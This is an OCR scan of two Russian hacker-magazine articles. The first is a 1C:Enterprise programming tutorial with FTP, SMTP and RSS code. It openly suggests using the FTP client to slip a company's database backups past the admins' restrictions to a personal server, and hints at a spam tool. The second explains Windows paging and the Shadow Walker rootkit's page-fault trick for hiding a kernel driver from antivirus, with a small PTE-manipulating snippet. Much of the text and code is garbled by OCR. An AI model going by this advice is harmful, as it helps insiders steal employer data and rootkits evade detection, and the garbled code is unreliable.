ко для манипулирования данными и построения отчетов. Ноне 
стоит раньше времени облизываться и думать, что на платформе 
1 С Предприятие 8х можно написать абсолютно любую программу и 
уж тем более вызывать полезные ѴѴіпАРІ -функции. Увы, пока этого 
сделать нельзя. «Что же тогда в нем хорошего?», — спросишь ты. А 
я отвечу: большая коллекция готовых к работе объектов. В том чис- 
лен «классы» для работы с такими вещами, как: РТР, НТТР,ХМІ_, 
5МТР, РОРЗ и т. д. Представляешь, что с их помощью возможно 
написать? 

ЗАЧЕМ ЮЗАТЬ ИМЕННО 1 С:ПРЕДПРИЯТИЕ 

Я понимаю тебя, мой друг. Тебе ничего не стоит взять и написать 
вирус, троян, сканер портов и другие полезные в хакерском деле 
программы на любом «нормальном» языке программирования. За- 
чем же заморачиваться с каким-то 1 С? Отчасти это так, но рано или 
поздно может возникнуть ситуация, когда кроме 1 С: Предприятия, 
заюзать ничего будет нельзя. В от те бе типичный пример. Ты устро- 
ился на работу админом БД и доблестные системщики урезали твои 
права по максимуму: ни тебе полноценного инета, ни возможности 
запуска «не доверенных» приложений и т.д. Зато в отношении баз 
и платформы 1 С:Предприятие — никаких ограничений. Выполнять 
бэкапы и по возможности пересылать их на удаленные сервера, 
управлять списком пользователей — типичные задачи администра- 
тора баз данных. А воттеперь представь, что большинство недо- 
стающих и привычных в жизни вещей ты сможешь за кодить прямо 
на встроенном в 1 С:Предприятие языке! Ничто не помешает тебе 




НАИПРОСТЕЙШИЙ РТР-КЛИЕНТ 




5МТР-КЛИЕНТ ИЛИ ФУНДАМЕНТ СПАМ-ТУЛЗЫ? 

заграбастать бэкап ценной базы данных и благополучно залить его 
на какой-нибудь сервак в инете. 

С ЧЕГО НАЧИНАЕТСЯ КОДИНГ ПОД 1 С 

Встроенный язык 1 С Предприятия внешне очень сильно отличается 
от привычных нам С#, РуЕбоп, БеІрЫ и т. д. Главное отличие в том, что 
приходится использовать русский синтаксис. Проблема на первый 
взгляд не сильно большая, но по первости мозг рвет капитально. 
Ксчастью, это недоразумение победить возможно. Разработчики 
платформы 1 С: Предприятие не зря получают свои деньги — они про- 
думали все наперед и снабдили свое детище английским вариантом 
синтаксиса. Ты можешь юзать любой понравившийся вариант. Мне 
привычнее писать «по-русски», поэтому все листинги в статье будут 
приведены на великом и могучем. Если тебе по душе традиционный 
английский вариант — то милости прошу к встроенной документации. 
Внейопи саны все функции/операторы: какванглийской.таки в 
русской версиях. 

ОСНОВЫ СИНТАКСИСА 

Если мне не изменяет память, в нашем журнале еще ни разу не 
рассматривали кодинг под 1 (^Предприятие, поэтому перед тем, как 
перейти к рассмотрению вопросов разработки реальных приложе- 
ний, нужно обязательно познакомиться с базовым синтаксисом. 

РЕГИСТР 

Встроенный язык в 1 С:Пред приятие не чувствителен к регистру. Ты 
можешь писать название операторов/переменных прописными или 
строчными буквами — все будет работать одинаково хорошо. 

ПЕРЕМЕННЫЕ 

Каки вомногихязыках программирования, переменные ты можешь 
объявлять по ходу пьесы. Никаких областей типа дельфийского ѵаг 
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СОРІЫС 



^Конфигуратор - Конфигурация - [С:\0оситепІ;5 апсі 5еЫ:іпд5\и5ег\Мои документы\Внешняя0бра6отка1.ерГ: Форма] 



ІвЭЗВайл Древка Текст Конфигурация Отладка Администрирование Сервис Окна Справка 

Ш іи х % й е* ЕІ ъ 2 I Н « 3 «■ Ти & X И в» „ I 'й (Р- + о <> 

Н -і» * 



. б> х 



Ій^вЙП > , 1 13 © © II (к < 



® .. 



Пароль - ""! 

Сервер = "іср.тазсегЬозс.ги"; 

Каталог ДляЗаписи = "ѵг-опііпе . ги/шш/сезс/ "; 



Попытка 

ГТРСоединение в Новый ГТРСоединение (Сервер, , ИмяПользователя, Пароль); 
ГТРСоединение . УстановитьТекущийКаталог (Катало г Для Записи) ; 

Исключение 

Сообщить ("При попытки соединения с ГТР сервером возникла ошибка! ", Статус 
Сообщить (ОписаниеСЬьибки ( ) ) ; 

Возврат; 

Коне «Попытки; 



Попытка 

ГТРСоединение . Записать ( ЗлементыФормы. пвПутьКФайлу . Значение, 

ЗлементыФормы. ПолеВвода 1 . Значение) ; 

Исключение 

Сообщить ("Во время передачи файла возникла ошибка!", С татусСо общения. Важ» 
Сообщить (ОписаниеОшибки ( ) ) ; 

КонецПопытки; 

Ко не «Процедуры 



Диалог |і Модуль | 2 Реквизиты 

КОДИНГ В НЕПРИВЫЧНОЙ СРЕДЕ В САМОМ РАЗГАРЕ 






Свойства: Встроенный язык 



М* X 


V 


▼Текст: 


Число строк: 


42 , 


Число символов: 


1 244 


Статус: 


Т екст открыт для записи 




ч 

► 



и ѵ 









| Свойства: Встроенный яз... | ф Сингакс-помощник 






< Справка : Сол^рждннк 



нет (если не считать ключевого слова «Пере м» для объявления 
глобальных переменных]. С типами переменных ситуация анало- 
гичная. Указывать для переменной конкретный тип в момент ее 
определения нетребуется. Он выбирается на основе содержимого 
переменной. Пример: 



СтроковаяПеременная = "Неііо, ілгогісі!" ; 

/ /Это строковая переменная 
ЧисловаяПеременная = 0 ; 

//А вот это числовая переменная 
Массив = Новый Массив ( ) ; //Ну а это массив 



ПРОЦЕДУРЫ ФУНКЦИИ 

В 1 С :Пред приятии принято делить весь код на процедуры и функ- 
ции. Определяются они стандартным образом: 



ІС'Преалрбтегтче 

Пел^емие справки 






Формат поисковых вырзж 






іі 



К&іднФариро ванне 
К.сяФи'ураипй 

Работе с конфигурацией 
Свойства иомФнгдоацнн 
Сохранение конфигурации е файл 
Загрузка коиФл-црации нэ Файла 
Сравнение и объединение коифятрзций 
— [П: Огансание структуры конФигураиш 
Конфигураанз базы данных 
Редагтироваша объектов конфіа^рации 
8нащ™а отчеты и обработки 

Меиут 

Макеты 
Формы 

Палитра свойств 
Отлай 1 »*! 

Сравнитъ Файлы 
Настройка параметров 



і 



С 1С:ПРЕДПРИТИЕ ПОСТАВЛЯЕТСЯ ОТЛИЧНАЯ 
СПРАВКА 



//Процедура без параметров 
Процедура ПримерПроцедуры ( ) 

КонецПроцедуры 
//Процедура с параметрами 

Процедура ПримерПроцедуры (Параметрі , Параметр2 ) 

КонецПроцедуры 

//Пример функции 

Функция ПолучитьДиректорию (Параметрі , Параметр2 ) 

Возврат Параметрі + Параметр2 ; 

КонецФункции 

ЦИКЛЫ 

Во встроенном языке реализовано несколько видов циклов. По син- 
таксису они не особо отличаются от оформления аналогичных циклов 
в других языках программирования. Взгляни на примеры: 

//Цикл «Пока». Аналогичен циклу ѵбЬіІе. . бо 
//в других языках 

//Пример выведет цифры от 1 до 9 в окно 
//служебных сообщений 
Счетчик = 1 ; 

Пока Счетчик о 10 Цикл 

Сообщить (Счетчик) ; 



Счетчик = Счетчик + 1; 
КонецЦикла ; 

//Цикл «Для». Аналогичен циклу 
//бог. .То. .Іо в других языках 

//Пример выведет цифры от 1 до 10 в окно 
/ /служебных сообщений 

Для Счетчик = 1 По 10 Цикл 

Сообщить (Счетчик) ; 

КонецЦикла ; 

//Цикл «Для Каждого». Аналогичен циклу 
/ /богеасЬ. в других языках 

//Пример демонстрирует перебор массива 
Массив = Новый Массив (2) ; 

Массив [ 0 ] = 1 ; 

Массив [1] = 2 ; 

Для Каждого Запись Из Массив Цикл 
Сообщить (Запись) ; 

КонецЦикла ; 
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5МТР-КЛИЕНТ В ДЕЙСТВИИ 



УСЛОВИЯ 

Без условных операторов далеко не уедешь, внимательно посмотри 
нато, какони описываются в 1 С:Предприятии: 

//Пример использования конструкции 
/ / " Если . . Тогда . . Иначе I ИначеЕсли . 

//Конструкция аналогична " ІЕ. . ТНЕЕГ. . ЕЬ8Е" в 
//других языках. 

Значение = 5 ; 

Если (Значение = 1) Тогда 

Сообщить ( "Первое условие" ) ; 

ИначеЕсли (Значение = 2) Тогда 

Сообщить ( "Второе условие" ) ; 

Иначе 

Сообщить ( "Третье условие" ) ; 

КонецЕсли; 



КЛАССЫ 

А нет их в 1 С: Предприятии :). Если ты привык к использованию 00 П- 
стиля, то знай, что сейчас с этим напряг. Во встроенном языке пока 
отсутствует поддержка определения своих собственных классов. 
Приходится довольствоваться процедурным подходом. 

РТР-КЛИЕНТ 

РТР- клиент — софтина очень полезная. Довольствуешься огра- 
ниченным доступом к инету, а из приложений лишь М5 ОІТісе, да 
оснастки для работы с СУБД? Что же делать, если требуется вывести 
с рабочего компа полезные файлы (например, бэкапч и к корпора- 
тивной базы)? Как вариант, можно залить все файлы на свой личный 
РТР- сервер. Во многих организациях админы серьезно ограничи- 
вают доступ кѴѴѴѴѴѴ, а такие протоколы, как РТР, РОРЗ, 5МТР, остаются 
полностью открытыми. На этом и попробуем сыграть. Дело за малым — 
написать РТР-клиент. Да не просто написать, а закодить на языке, 
совершенно не предназначенном для этой цели. 
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СООІЫО 




Итак, запускай 1 С : П р ед приятие в режиме «Конфигуратор» и 
создавай новую обработку. 

Я не буду тебе расписывать, как работать с самой ЮЕ, это 
выходитза рамки статьи. Всю необходимую инфуты сможешь 
посмотреть в хелпе. Лучше сразу к коду. 

В 1 С:Предприятии для работы с протоколом РТР есть встроенный и 
полностью готовый к работе класс: РТРСоединение. Класс достаточ- 
но хорош и в нем реализованы все необходимые свойства и методы. 
Туттебе и поддержка работы через РРОХУ-сервер, и закачка/пере- 
дача файлов и т. д. Не буду ходить вокруг да около, а перейду к рас- 
смотрению рабочего примера. Вот код, отвечающий за соединение и 
отправку произвольного файла: 



РТР-КЛИЕНТ СРЕДСТВАМИ ІСіПРЕДПРИЯТИЯ 

ИмяПользователя = "Логин"; 

Пароль = " " ; 

Сервер = "Имя сервера"; 

КаталогДляЗаписи = " папка для записи" ; 
Попытка 



РТРСоединение = Новый РТРСоединение (Сервер , 

, ИмяПользователя, Пароль) ; 

РТРСоединение .УстановитьТекущийКаталог ( 
КаталогДляЗаписи) ; 

Исключение 

Сообщить ( "При попытке соединения с РТР 
I сервером возникла ошибка ! " , 

Стату сСообщения . Важное ) ; 

Сообщить (ОписаниеОшибки ( ) ) ; 

Возврат; 

КонецПопытки ; 

Попытка 

РТРСоединение . Записать ( 

ЭлементыФормы . пвПутьКФайлу . Значение , 

ЭлементыФормы . ПолеВводаІ . Значение) ; 

Исключение 

Сообщить ("Во время передачи файла возникла ошиб- 
ка! " , 

Стату сСообщения . Важное) ; 



Другие 



полезные примеры 



ЬНр://іп1 : о5І:агРги/риЫіс/201 44 — ІСО-клиент, выполненный в 
виде внешней компоненты. Внутренности контрола состоят из С# 
кода и известной в .ЫЕТ-кругах либы — ІсцЗЬагр 0.4. 0.0. Хочешь 
чатиться в аське прямо из 1 С? Тогда этот пример специально для 
тебя! 

ЬирѴ/іпЬзІагРги/риЫіс/1 445 " — смесь тети Аси и дяди 
Джаббера. Еще один внешний контрол и пример использования, 
при помощи которого ты сможешь закодить клиентские части для 
популярных протоколов передачи сообщений. 

Ьир://іп1ю5І:агЕги/риЫіс/20223 — здесь тусуется пример 
реализации «продвинутого» медиаплеера для платформы 
1 (^Предприятие 8.x. Умеет воспроизводить как видео, так и 
аудио-файлы. 



ЬПрУ/іпІюзІюгЕги/риЫіс/1 633 ; — это не просто обработка, а 
настоящая кладезь примеров. Туттебе и файловый менеджер, и 
ЕТР-клиент, и встроенный браузер, и диспетчер задач, и менед- 
жер программ, и куча всякой полезной всячины. Заюзал такую 
обработку в 1 С:Предприятии и забыл про многочисленные тулзы. 
Разве это не здорово? 



Сообщить (ОписаниеОшибки ( ) ) ; 

КонецПопытки ; 

Установка соединения по РТР начинается с инициализации класса 
«РТРСоединение». В качестве параметров конструктору необходимо 
передать следующие параметры: 

• Сервер — адрес ЕТР-сервера (обязательный] 

• Порт— номер порта ЕТР-сервера (необязательный] 

• ИмяПользователя — пользователь на ЕТР-сервере 

• Пароль 

• Прокси — объект, содержащий настройки РРОХУ-сервера (необяза- 
тельный] 

• ПассивноеСоединение — Тип соединения (необязательный] 

Если инициализация пройдетуспешно.то ЕТР-соединение будетуста- 
новлено. Ну а после его установки ты можешь воспользоваться одним 
из методов класса. Например, в своем примере я вызвал Установить- 
ТекущийКаталогО. Для демонстрации работоспособности примера я 
заюзал метод За писать(]. Он выполняет передачу локального файла 
на ЕТР-сервер. Обрати внимание, вызов каждого метода я взял в блок 
«Попытка. .исключение. .КонецПопытки». Если ты знаком с понятием 
«Исключительные ситуации», то должен понять, для чего эта конструк- 
ция предназначена. 

ОТПРАВЛЯЕМ ПОЧТУ 

ЕТР-клиентсредствами 1 С:Предприятие — это супер, но им одним сыт 
не будешь. Что ни говори, а обойтись без электронной почты крайне 
трудно. Что ж, если возможности юзать полноценный клиентутебя нет, а 
из имеющего софта —лишь 1 (^Предприятие, то считай, что тебе крупно 
повезло. Закодить на встроенном языке обработку для отправки/приема 
почты — проще пареной репы. Сейчасты в этом убедишься (см. врезку 
«Почтовый клиент»]. 

Для отправки и приема почтовых сообщений в платформе 
1 С:Предприятие существует несколько готовых классов — ИнтернетПоч- 
товоеСообщение, ИнтернетПочтовыйПрофиль, ИнтернетПочта. Первый 
— это, по сути, «обертка» электронного письма. В нем реализованы все 
необходимые поля для электронного письма: необходимость получения 
отчета о доставке, список получателей, прикрепленные файлы ит.д. От 
разработчиков (то есть, нас стобой], требуется лишь правильно ихзапол- 
нить. Именно это я описал в первой части кода — присвоил свойствам 
класса значения из полей ввода, расположенных на форме обработки. 
Сформировав письмо, нам остается лишь прилепить на него почтовую 
марку и отправить по месту назначения. Для выполнения этого действия 
я использую второй класс — ИнтернетПочтовыйПрофиль. Если ты вни- 
мательно ознакомился со вторым листингом, то должен был уже дога- 
даться, что этот класс — не что иное, как обертка для хранения настроек 
соединения с почтовыми серверами. В исходнике на врезке я привел 
вариантзаполнения свойств для соединения с зппір-сервером своего 
почтового провайдера (через которого будет выполняться отправка]. 
Класс ИнтернетПочтовыйПрофиль л ишь хранит настройки для под- 
ключения. Ничего отправлять/получать он не может. За саму передачу 
отвечаеттретий класс — «Инте 

рнетПочта». Во время инициализации ему необходимо передать 
экземпляр класса «ИнтернетПочтовыйПрофиль». После этого можно 
выполнять подключение и отправку. Туттебе помогут методы «Подклю- 
читься» и «Послать». Кстати, не забывай заключать их в эксепшины, 
иначе замучаешься ловить вылеты. 

КУРИМ ТРУБКУ, ЧИТАЕМ НОВОСТИ 

Я очень люблю читать Н55-ленты различных блоггеров. То и дело в 
них появляются интересные топики. Обычно для таких целей я юзаю 
Ооодіе Реабег, но на старой работе приходилось пользоваться тулзой 
собственного изготовления. Ну а поскольку моя прошлая работа была 
связана с программированием под платформу 1 С:Предприятие, то эту 
самую тулзу мне пришлось с ваять на своем «рабочем» языке. 

Сама Р55-лента — это ХМЕ-файл. Соответственно, работать с ним нуж- 
но, как с любой ХМІ_ — парсить. В одном из номеров нашего журнала, я 
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агрегатор 


Почтовый 




НазваниеКанала = КЗЗЛента . зеІескЗіпдІеЫосІе ( 




Письмецо = Новый ИнтернетПочтовоеСообщение; 




" //сПаппеІ/сІезсгірІііоп" ) . Техб ; 




Письмецо . Тема = 




Элементы = КЗЗЛента . зе1есбІ\ІосІ.ез ( " / /іСеш" ) ; 




ЭлементыФормы . пвТемаПисьма . Значение ; 








Письмецо . ИмяОтправителя = 




Для сч = 0 по Элементы . ІепдбН-1 Цикл 




ЭлементыФормы . пвИмяОтправителя . Значение ; 




СчитАтриб = Элементы, і бет (сч) . сШІсМобеа; 




Письмецо . Отправитель .Адрес = 








ЭлементыФормы . пвАдресОтправителя . Значение ; 




СтруктураАтрибутов = Новый Структура ( ) ; 




Получатель = Письмецо . Получатели . Добавить ( ) ; 




Для сч2 = 0 по СчитАтриб . ІепдбЬ-1 цикл 




Получатель . Адрес = 




СтруктураАтрибутов . Вставить 




ЭлементыФормы . пвАдресПолучателя . Значение ; 




(СчитАтриб . і б еш (сч2 ) . побеЫате, 
СчитАтриб . ібеш ( сч2 ) . бехб ) ; 




ТекстПисьма = Письмецо . Тексты . Добавить ( ) ; 




КонецЦикла ; 




ТекстПисьма . ТипТекста = 








ТипТекстаПочтовогоСообщения . ПростойТекст ; 




ЗаголовокНовости = "Заголовок: 




ТекстПисьма . Текст = пвТекстСообщения; 




Если (СтруктураАтрибутов . Свойство ( "бібіе" ) ) Тогда 




Если (ЗначениеЗаполнено 




ЗаголовокНовости = ЗаголовокНовости + 




( ЭлементыФормы . пвАттач . Значение ) ) Тогда 




СтруктураАтрибутов . бібіе; 




Письмецо . Вложения . Добавить ( 




КонецЕсли; 




ЭлементыФормы . пвАттач . Значение ) ; 








КонецЕсли; 




ДатаПубликации = "Дата публикации : 




//Настраиваем параметры отправки 




Если (СтруктураАтрибутов . Свойство ( "риЬБабе" ) ) Тогда 




ПрофайлНастроек = Новый ИнтернетПочтовыйПрофиль; 




ДатаПубликации = ДатаПубликации + 




ПрофайлНастроек . АдресСервераЗМТР = 




ДатаКЕС822 (СтруктураАтрибутов . риЬБабе) ; 




ЭлементыФормы . пвПочтовыйСервер . Значение ; 




КонецЕсли; 




ПрофайлНастроек . ПортЗМТР = 








ЭлементыФормы . пвПортПочтовогоСервера . Значение ; 




Линк = "Адрес публикации: 




ПрофайлНастроек . АутентификацияЗМТР = 








СпособЗМТРАутентификации . ПоУмолчанию; 




Если (СтруктураАтрибутов . Свойство («Ііпк») ) Тогда 




ПрофайлНастроек . ПользовательЗМТР = 




Линк = Линк + СтруктураАтрибутов . Ііпк ; 




ЭлементыФормы . пвАдресОтправителя . Значение ; 




КонецЕсли; 




Почтовик = Новый ИнтернетПочта; 




ТекстНовости = "Текст новости: "; 




Попытка 




Если (СтруктураАтрибутов . Свойство ( "безсгірбіоп" ) ) 




Почтовик . Подключиться (ПрофайлНастроек) ; 




Тогда 








ТекстНовости = ТекстНовости + 




Исключение 




СтруктураАтрибутов . безсгірбіоп; 




Сообщить ("Во время отправки возникла ошибка! 




КонецЕсли; 




Текст ошибка: " + ОписаниеОшибки ( ) , 








СтатусСообщения . ОченьВажное) ; 




Сообщить ( " " ) ; 




Возврат; 




Сообщить (ЗаголовокНовости) ; 




КонецПопытки ; 




Сообщить (ДатаПубликации) ; 
Сообщить (Линк) ; 




//Пробуем отослать 




Сообщить (ТекстНовости) ; 




Попытка 




Сообщить ( " " ) ; 




Почтовик . Послать (Письмецо) ; 




КонецЦикла ; 




Сообщить ( "Ваше сообщение было успешно отправлено! " , 
СтатусСообщения . ОченьВажное) ; 

Исключение 




приводил пример К55-граббера. Тогда мой пример был на ЭеІрЫ. Для 




разбора ХМІ_ я использовал СОМ-объект МісгозоіТ ХМ І_НТТР. Ты не 


Сообщить (" Сообщение не было отправлено! " + 




поверишь, нов 1 С :Пред приятии мы можем воспользоваться этим же 


ОписаниеОшибки ( ) , 




объектом. Взгляни на врезку «Р55-агрегатор» и убедись сам. 


СтатусСообщения . ОченьВажное) ; 




01ІТК0 


КонецПопытки ; 




При особом желании и настойчивости нужные тулзы реально за ко- 
дить даже на таком, казалось бы, не предназначенном для подобных 


Почтовик . Отключиться ( ) ; 





целей языке, как встроенный язык платформы 1 С:Пред приятие. 
Главное, не поленись потратить немного времени и попробуй подой- 
ти к решению проблемы творчески. Вполне возможно, что пришед- 



шее на ум спонтанное решение будет намного лучше, чем то, которое 
прорабатывалось долгое время. Экспериментируй и все будет ОК! ~5-г 
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ССЮІЫб 



■ ■ Александр Эккерт зіаппіс.тапгадтаіі.сот 

ЗЛЫЕ ШУТКИ „ 

С ВИРТУАЛЬНОЙ 
ПАМЯТЬЮ 

КОВЫРЯЕМ ѴѴІЫ00ѴѴЗ ПО ПРИМЕРУ 
ИЗВЕСТНЫХ РУТКИТ-МЕЙКЕРОВ 

В ОСНОВЕ ФУНКЦИОНИРОВАНИЯ СОВРЕМЕННЫХ ОПЕРАЦИОННЫХ 
СИСТЕМ ЛЕЖИТ ВИРТУАЛЬНАЯ ПАМЯТЬ. ИМЕННО ОНА ПОЗВОЛЯЕТ 
АДРЕСОВАТЬ В 32-БИТНЫХ СИСТЕМАХ 4 ГИГАБАЙТА ВИРТУАЛЬНОГО 
АДРЕСНОГО ПРОСТРАНСТВА. А 64-БИТНАЯ АДРЕСАЦИЯ. 

В СВОЮ ОЧЕРЕДЬ, ПОЗВОЛЯЕТ ИСПОЛЬЗОВАТЬ ПРАКТИЧЕСКИ 
НЕОГРАНИЧЕННОЕ КОЛИЧЕСТВО ВИРТУАЛЬНОЙ ПАМЯТИ. 



Сегодня мы поговорим об основном способе 
организации виртуальной памяти — странич- 
ном, при котором единицей отображения 
виртуальных адресов на физические является 
регион постоянного размера (так называемая 
страница]. Поддержка такого режима при- 
сутствует в большинстве современных про- 
цессоров, и он стал классическим для почти 
всех современных ОС, в том числе ѴѴіпсІоѵѵз. 

В статье мы попытаемся рассмотреть, как этот 
«классический» аргумент можно использовать 
в своих грязных целях. 

ВВЕДЕНИЕ ИЛИ О НЕМ ЭТО МЫ? 

В большинстве современных операционных 
систем, в том числе, в семействе ОС ѴѴіпсІоѵѵз, вир- 
туальная память организуется с помощью странич- 
ной адресации. Если говорить коротко и понятно, 
то данные в памяти в ѴѴіпсІоѵѵз существуют: 

1] в виртуальном виде размером в 4 гигабайта 
и 2] в проекции этих самых данных в памяти 
физической и, наконец, в виде так называе- 
мых страниц. 



Что такое страницы? Это области памяти 
фиксированной длины (как правило, или 
4 Кб, или 4 Мб], которые являются мини- 
мальной единицей выделяемой памяти (то 
есть, даже запрос на 1 байт от приложе- 
ния приведет к выделению ему страницы 
памяти]. Процесс обращается к памяти 
с помощью адреса виртуальной памяти, 
который содержит в себе номер страницы и 
смещение внутри страницы. Операционная 
система преобразует виртуальный адрес в 
физический, при необходимости подгружая 
страницу с жесткого диска в оперативную 
память. При запросе на выделение памяти 
операционная система может сбросить на 
жесткий диск страницы, к которым давно не 
было обращений. Соответствующие единицы 
в физической памяти образуют страничные 
кадры (раде ітатез], а система поддержки 
страничной виртуальной памяти называется 
пейджингом (рад і пд] . Передача информации 
между памятью и диском всегда осущест- 
вляется целыми страницами. Главное, что 



надо уяснить — данные, представленные в 
виртуальной памяти, на самом деле находят- 
ся в памяти физической (оперативной или 
сброшены на жесткий диск] и для доступа к 
ним процессор использует механизм стра- 
ничной трансляции. Таким образом, опера- 
ция записи в память какого-либо процесса в 
конечном итоге сведется к записи страниц, 
принадлежащих этому процессу и находя- 
щихся в где-то в физической памяти. Если 
вдуматься, то получается, что данные нахо- 
дятся как бы в дублированном состоянии 
(хотя это не так]: непосредственно сами дан- 
ные лежат в памяти физической, и они же 
представлены в памяти виртуальной. А раз 
основная организация виртуальной памяти 
есть страничная память, что нам помешает, 
не трогая виртуальных адресов, найти сами 
физические страницы, содержащие нужные 
нам данные и использовать (читай — «пере- 
записать или подменить»] их по своему 
усмотрению? Да ничего! Ни антивирусы, ни 
проактивки, ни файрволы нам не помеха! В 
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КАК ПОЛУЧИТЬ РТЕ ДЛЯ ВИРТУАЛЬНОГО АДРЕСА 
0хе4321 000 



Ш 



0x300 

0x390 



г 




0x321, 



РТ 



СеІРІеАсШгезз: 

0хе4321000 

=>0хс0390с84 



РТЕ 



1100 00000011 1001 0000 00 






ТАК МОЖНО ПОЛУЧИТЬ АДРЕСА РТЕ 




итоге мы получим стелс-технологию, которая может бес- 
палевно подменять нужные нам данные в адресном про- 
странстве процесса. 

РАЗБИРАЕМ УСТРОЙСТВО 
ВИРТУАЛЬНОМ ПАМЯТИ 

Чтобы применять эту технику на практике, конечно же, 
нужно понять основы — правила организации и механизм 
работы виртуальной и страничной адресации. Не вдава- 
ясь в подробности механизма страничной адресации (он 
довольно сложен для понимания), отмечу только, что в 
его основе используется двухуровневая табличная транс- 
ляция линейного адреса в физический. Этот механизм 
имеет три части: каталог страниц (Раде ОігесТогу, РЭЕ), 
таблицы страниц (Раде ТаЫе, РТЕ) и собственно страницы 
(Раде Егате). Тем, кто хочет досконально разобраться в 
механизме страничной трансляции, могу порекомендовать 
мануалы ІІЧТЕЕа по системному программированию; их 
ты можешь найти на сайте ѵѵѵѵѵѵ.іпіеі.сопп или на нашем 
диске. 

Как же можно заполучить доступ к этим каталогам — РЭЕ 
и РТЕ? Очень легко! Любителям лаконичности можно 
посоветовать вот такой способ обретения указателя на 
таблицы страниц РТЕ: ((РТЕ*) (( ( ( ( Э Ю N 0) (Ѵі гіиа ІАсІсІ гезз)) 

>> 12) << 2) + РіеВазеАсІсІгезз)), где РіеВазеАсІсІгезз 
равен 0x00000000. Для любителей махровой лаконич- 
ности, сокращений и оптимизации могу посоветовать и 
такой вариант РТЕ: = ( ѴігІиаІАсІсІгезз >> 10]+0хс0000000. 
Соответственно, обратный алгоритм поиска адресов 
виртуальной памяти по известным РТЕ будет выглядеть: 
ѴігІиаІАсІсІгезз = РТЕ << 10. 

Стоит, наверное, пояснить. Допустим, у нас есть линейный 
32-байтный адрес: 1100000000.0000000101.0000001001.00 
Ь (точки использованы для удобства). Глядя на этот адрес, 
получим РТЕ с номером 1001 Ь в таблице страниц 101 Ь. 

В ядре существует целый набор системных функций, пред- 
назначенных для работы с памятью, как физической, так 



и виртуальной. Все они имеют префикс Мт*. В юзермоде 
тебе должны быть знакомы функции ѴѴгіІеРгосеззМетогу 
и РеасІРгосеззМетогу, хотя на самом деле они являют- 
ся «заглушками» для вызова сервисов ядра. Например, 
функция МтОеіРЬузісаІАсІсІгезз вернет физический 
адрес, что соответствует виртуальному адресу, находя- 
щемуся в неподкачиваемой памяти. Системная функция 
ядра — М т I зАсІ сі геззѴа Іі сі О — всего-навсего проверяет, 
представлена ли страница в физической памяти, т.е. не 
сработает ли исключение «Раде Еаиіі» при обращении 
по указанному виртуальному адресу. Если страницы нет, 
то функция вернет ЕАБЭЕ. Также интересна функция 
МтІзЫопРадебЭузІетАсІсІгеззѴаІісІ, которая в отличие от 
М т I зАсІ сі геззѴа Іі сі проверяет, что переданный ей адрес при- 
надлежит подкачиваемой или неподкачиваемой областям 
памяти ядра. Так, затрагивая тему работы с виртуальной/ 
физической памятью, хотелось бы заметить, что у страниц в 
памяти может быть несколько состояний. Перечислим их! 

СПОСОБ РАЗ, „ 

ИЛИ «ПОЙМАЙ МЕНЯ, 

ЕСЛИ СМОЖЕШЬ!» 

В момент обращения страница может присутствовать в 
физической оперативной памяти, а может быть выгру- 
женной на внешнюю (дисковую) память. При обращении 
к выгруженной странице памяти процессор генерирует 
исключение #РЕ — «Раде Райи» или отказ страницы, а 
программный обработчик исключения (часть ОС) получит 
необходимую информацию для свопинга — «подкачки» 
отсутствующей страницы с диска. И самое главное — 
страницы не имеют прямой связи с логической структурой 
данных или программ. Абсолютно стандартное поведе- 
ние менеджера виртуальной памяти! И ведь кто бы мог 
подумать — эта «особенность» виртуальной памяти ОС 
ѴѴі псІо\л/5 используется в руткитостроении. Каким образом? 
Если ты знаешь, список системных модулей (читай — 
драйверов) ядра можно получить, вызвав систем- 




[ НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

Ц* Хочешь знать 
все-все о памяти в 
ѴѴіпсІоѵѵз? Бегом на 
дг8.сіЬ.тз/іпс!ех. 
рЬр?епЩу=епЩу008 
— лучше этой статьи 
админа форума 
ѵѵазт.ги под ником 
Огеаі не найти. 

• Также замеча- 
тельная статья по 
управлению памятью 
в ОС ѴѴіпсІоѵѵз, 
правда, на англий- 
ском — ѵѵѵѵѵѵ.іпІогтіЕ 
сот/агіісіез/а гіісіе. 
азрх?р=1 67857 . 




> іпіо 

Будь осторожен при 
опытах с виртуальной 
памятью! 




> СІѴСІ 

На дискеты сможешь 
найти литературу, 
которая поможет 
в отладке и дебаге 
твоего кода. Обещан- 
ные сорцы руткита 
ЭЬасІоѵѵ ѴѴаІкегждут 
тебя там же. 
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ССЮІЫб 




РУТКИТ ПЕРЕХВАТИЛ ПРЕРЫВАНИЯ #РР И #6Р 



ную функцию ІѴШиегуЗузІетІпЬгтаІіоп 
с параметром ЭузіетМосІиІеІпіюгппабоп 
или открыв директорию «\0гіѵег» вызо- 
вом 2\л/0иегу01гес1:огу0Ь]есЕ Также 
можно пробежаться по системному списку 
РзІ-оасІесІМосІиІеизІ: (расписывать эти спосо- 
бы не буду, тема статьи другая, если интерес- 
но — за подробностями в Гугл]. 

Все известные способы сокрытия драй- 
вером заключались в патче указанных 
функций или исключении имени модуля из 
РзІ-оасІесІМосІиІеизГ 

Но вот на свет появился ЭЬасІоѵѵ ѴѴаІкег — 
руткит уровня ядра. Главной его особенностью 
является способ сокрытия в ядре нужных 
хакеру данных — как правило, ЗЬабоѵѵ ѴѴаІкег 
скрывает другой драйвер руткита РІА Это, с 
позволения сказать, революционное решение 
заключается в следующем. Загруженный драй- 
вер руткита ставит перехват на прерывание 
ІІЧТОЕ и помечает нужные физические страни- 
цы как «не представленные в памяти» — 
и в случае обращения менеджера вирту- 
альной памяти к этим самым страницам, 
где лежит драйвер, будет сгенерировано то 
самое исключение — #РГ или «РадеРаиІІ». 
Здорово, правда? 

Когда произойдет ошибка страницы (при ее 
чтении] в связи с тем, что РТЕ помечен как 
недействительный, ЗЬасІоѵѵ ѴѴаІкег опреде- 
ляет, является ли страница той, которую 
необходимо скрыть; если да, то подменя- 
ются данные на странице. Если происходит 
выполнение на странице кода руткита, 



ЗЬасІоѵѵ ѴѴаІкег просто помечает РТЕ как 
действительные и дает процессору доступ к 
странице. Правда, проблема здесь в сложно- 
сти определения, что именно понадобилось 
процессору: прочесть данные или выполнить 
код. Разработчиками ЗЬасІоѵѵ ѴѴаІкег было 
решено и это; для ознакомления сорцы 
руткита лежат на диске, думаю, ты сможешь 
разобраться сам. 

Убираем бит представления 

страницы в памяти 

ѴОІБ МагкРадеЫоСРгезепД ( 

РРТЕ рРСе ) 

{ 

азш 

{ 

тоѵ еах, рРСе 

апсі сТлгогсІ рСг [еах] , ОхРРРРРРРЕ 

} 

} 

Эффективность руткита такова, что до сих пор 
